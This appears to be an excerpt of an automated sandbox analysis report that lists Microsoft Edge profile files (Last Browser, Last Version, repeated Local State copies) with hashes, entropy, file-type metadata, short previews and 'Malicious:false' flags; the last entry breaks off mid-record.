                                                                                                                                                                                                                                                                                                  MD5:01C36B30A2848EACFBB7001AAA6BB81B
                                                                                                                                                                                                                                                                                                  SHA1:69B4A9F10D92FD1152CCF1ED66BCBCECB31C2AB6
                                                                                                                                                                                                                                                                                                  SHA-256:5FA766D648ABCE401E5361F07AF5CBAB3AFDAB7B72E529E19D25C15252E8F02E
                                                                                                                                                                                                                                                                                                  SHA-512:686B7977E21B653CB69C9BD281AC8467601266131988DAABB85489ACB58A92B66AFD14610E4B8CAEBB93459B495AF83CBE29B6ACDFFF7BE3271DF7C8585B53E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.473 1c34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-00:24:20.474 1c34 Recovering log #3.2024/12/23-00:24:20.474 1c34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41682.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4179b.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF417ba.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF441d8.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF44274.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4441a.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF46b0a.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4a9aa.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
